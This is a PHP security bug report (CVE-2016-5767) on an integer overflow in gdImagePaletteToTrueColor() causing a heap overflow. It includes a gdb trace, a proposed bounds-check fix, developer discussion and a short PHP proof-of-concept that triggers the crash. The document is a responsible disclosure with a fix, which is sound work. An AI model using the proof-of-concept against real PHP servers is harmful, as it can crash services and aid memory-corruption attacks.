php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72446 Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
Submitted: 2016-06-18 15:55 UTC Modified: 2016-06-23 12:33 UTC
From: gogil at stealien dot com Assigned: pajoye (profile)
Status: Closed Package: GD related
PHP Version: 5.5.36 OS: Ubuntu i386
Private report: No CVE-ID: 2016-5767
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
MUST BE VALID
Solve the problem:
48 - 18 = ?
Subscribe to this entry?

 
 [2016-06-18 15:55 UTC] gogil at stealien dot com
Description:
------------
The gdImagePaletteToTrueColor() is prone to an integer overflow, which result in heap based overflow.

Tested on 32-bits.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b libgd/gd.c:3035
Breakpoint 1 at 0x823a806: file /php/php-5.6.22/ext/gd/libgd/gd.c, line 3035.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3035
3035		const unsigned int sx = gdImageSX(src);
(gdb) n
3037		src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
(gdb) p/x sx
$1 = 0x40000000    <---------- 'sx' is 0x40000000.

(gdb) n
...
3047		src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));  <---------- sizeof(int) is 0x4.
<---------- gdMalloc will allocate memory with size 0. (LP32/LP64 only)

...
3052		dst_row = src->tpixels[y];
(gdb) n
3053		for (x = 0; x < sx; x++) {
...
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
(gdb) x/x dst_row+x
0xb4f96160:	0x2d9c25e0
(gdb) n
3053		for (x = 0; x < sx; x++) {
(gdb) x/x dst_row+x
0xb4f96160:	0x61616161    <---------- It cause heap overflow


(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0823a974 in gdImagePaletteToTrueColor (src=0xb4f96d34)
    at /php/php-5.6.22/ext/gd/libgd/gd.c:3058
3058				*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);




* Fix
File libgd/gd.c, line 123:
gdImagePtr gdImageCreate (int sx, int sy)
{
	int i;
	gdImagePtr im;

	if (overflow2(sx, sy)) {
		return NULL;
	}

	if (overflow2(sizeof(unsigned char *), sy)) {
		return NULL;
	}

+	if (overflow2(sizeof(int), sx)) {
+		return NULL;
+	}

	im = (gdImage *) gdCalloc(1, sizeof(gdImage));



Test script:
---------------
<?php
// poc.php
ini_set('memory_limit', -1);
$im = imagecreate(0x40000000, 1);
imagecolorallocatealpha($im, 0x61, 0x61, 0x61, 0x61);

imagepalettetotruecolor($im);
?>


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-19 03:54 UTC] stas@php.net
Looks like the issue is in libgd which means it should be reported to libgd maintainers.
 [2016-06-19 04:21 UTC] gogil at stealien dot com
libgd(2.0.34RC~lasted) is not affected by this vulnerability.
php's gdImageCreate() function used a slightly different routine.
 [2016-06-19 05:02 UTC] stas@php.net
-Assigned To: +Assigned To: pajoye
 [2016-06-19 05:02 UTC] stas@php.net
Pierre, could you take a look? Looks like merge is missing or something?
 [2016-06-19 07:43 UTC] pajoye@php.net
It should be:


	if (overflow2(sizeof (unsigned char *), sy)) {
		return NULL;
	}
	if (overflow2(sizeof (unsigned char *), sx)) {
		return NULL;
	}

palette image uses an 2D array of unsigned chars.

Gogil, Stas, thanks for all the reviews and fixes :) 

@Gogil btw, be sure to check in https://github.com/libgd/libgd as it seems you are looking to an old repo with 2.0.34 (bitbucket?) as latest version.
 [2016-06-19 10:07 UTC] gogil at stealien dot com
libgd(2.0.34RC~latest) is not affected by this vulnerability.

I am sorry for my typo mistake.
 [2016-06-19 14:52 UTC] pajoye@php.net
I got that thanks:)

What I mean is the latest release is 2.2.1 and 2.2.2 should come this week. :)
 [2016-06-19 15:52 UTC] gogil at stealien dot com
I got it.

thanks :)
 [2016-06-21 06:59 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 06:59 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 07:03 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.5.36
 [2016-06-21 07:03 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-21 07:27 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-22 05:57 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c395c6e5d7e8df37a21265ff76e48fe75ceb5ae6
Log: iFixed bug #72446 - Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
 [2016-06-23 12:33 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5767
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC